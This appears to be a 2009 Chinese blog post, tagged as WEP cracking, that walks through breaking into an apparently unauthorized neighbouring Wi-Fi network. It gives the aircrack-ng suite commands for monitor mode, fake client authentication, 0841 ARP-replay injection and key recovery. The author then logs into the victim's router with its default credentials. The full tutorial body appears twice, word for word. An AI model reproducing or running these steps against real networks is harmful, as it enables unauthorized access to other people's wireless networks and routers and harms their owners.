2009年11月11日星期三
实践无线WI-FI破解
此次破解针对wep加密。
条件:
破解软件:BT3-final
破解网卡:卡王rtl8187
破解环境:macbook pro mh991z/VMware fusion 2.06 虚拟机下
破解步骤:
1、先对周围无线ap作信号普查。使用工具是mac机下的realtek usb wlan client utility,使用网卡为rtl8187。普查结果如下图。
adma一行的key是破解后添加。开始选择channel1的Netgear,因为Netgear几乎可以很清楚地确定里我很近,每次上网都能稳定的看到它,而且信号强度也不错,但是伪装客户端与ap联系失败,如下图。
明明是正确的BSSID,但是命令执行结果是No such BSSID available,原因未知。重新选择为adma。
2、作攻击前的准备工作。
#ifconfig -a
用于破解网卡被正常驱动,设备名为wlan0。
#airmon-ng start wlan0 6
将wlan0设置为对channel6的监听模式。
#aireplay-ng --test wlan0
进行测试,看是否能实现注入攻击。下面的正确回应。
#airodump-ng --ivs -w name -c 6 wlan
dump频道6的IVs数据。下图是dump结果。
adam信号强度较高,采用wep加密方式,data有数据,可以作为攻击对象。该图示攻击完成之后的截图,所以#data值较高。由于adam没有客户端连接,初步选择伪造客户端连接之后进行0841交互式攻击的方案。
3、伪造合法客户端进行连接。
#aireplay-ng -1 0 -e adam -a 00:23:cd:e8:1f:c0 -h 00:e0:4c:8e:11:e5 wlan0
下图为命令执行成功的结果。
4、进行交互式攻击。
#aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b 00:23:cd:e8:1f:c0 -h 00:e0:4c:8e:11:e5 wlan0
命令执行后开始读包,当读到一个可以直接进行注入的数据包,会提示“use this packet”,选择y,开始发包注入,当获得足够IVs后,就可以用aircrack-ng进行破解。如下图。
5、用aircrack-ng进行破解。
#aircrack-ng -n 64 -b 00:23:cd:e8:1f:c0 name-02.ivs
满5000 IVs进行一次破解,本次破解满15000IVs才破解成功,历时大约1个半小时。结果如下图。
key竟然是1234567890。破解成功,可以直接登录到对方路由器上,用户名、口令都是缺省,对方路由器型号是mercury wm54v4,如下图所示。
使用珠江宽频线路上网。
条件:
破解软件:BT3-final
破解网卡:卡王rtl8187
破解环境:macbook pro mh991z/VMware fusion 2.06 虚拟机下
破解步骤:
1、先对周围无线ap作信号普查。使用工具是mac机下的realtek usb wlan client utility,使用网卡为rtl8187。普查结果如下图。
adma一行的key是破解后添加。开始选择channel1的Netgear,因为Netgear几乎可以很清楚地确定里我很近,每次上网都能稳定的看到它,而且信号强度也不错,但是伪装客户端与ap联系失败,如下图。
明明是正确的BSSID,但是命令执行结果是No such BSSID available,原因未知。重新选择为adma。
2、作攻击前的准备工作。
#ifconfig -a
用于破解网卡被正常驱动,设备名为wlan0。
#airmon-ng start wlan0 6
将wlan0设置为对channel6的监听模式。
#aireplay-ng --test wlan0
进行测试,看是否能实现注入攻击。下面的正确回应。
#airodump-ng --ivs -w name -c 6 wlan
dump频道6的IVs数据。下图是dump结果。
adam信号强度较高,采用wep加密方式,data有数据,可以作为攻击对象。该图示攻击完成之后的截图,所以#data值较高。由于adam没有客户端连接,初步选择伪造客户端连接之后进行0841交互式攻击的方案。
3、伪造合法客户端进行连接。
#aireplay-ng -1 0 -e adam -a 00:23:cd:e8:1f:c0 -h 00:e0:4c:8e:11:e5 wlan0
下图为命令执行成功的结果。
4、进行交互式攻击。
#aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b 00:23:cd:e8:1f:c0 -h 00:e0:4c:8e:11:e5 wlan0
命令执行后开始读包,当读到一个可以直接进行注入的数据包,会提示“use this packet”,选择y,开始发包注入,当获得足够IVs后,就可以用aircrack-ng进行破解。如下图。
5、用aircrack-ng进行破解。
#aircrack-ng -n 64 -b 00:23:cd:e8:1f:c0 name-02.ivs
满5000 IVs进行一次破解,本次破解满15000IVs才破解成功,历时大约1个半小时。结果如下图。
key竟然是1234567890。破解成功,可以直接登录到对方路由器上,用户名、口令都是缺省,对方路由器型号是mercury wm54v4,如下图所示。
使用珠江宽频线路上网。
标签: wifi wep crack
订阅 博文 [Atom]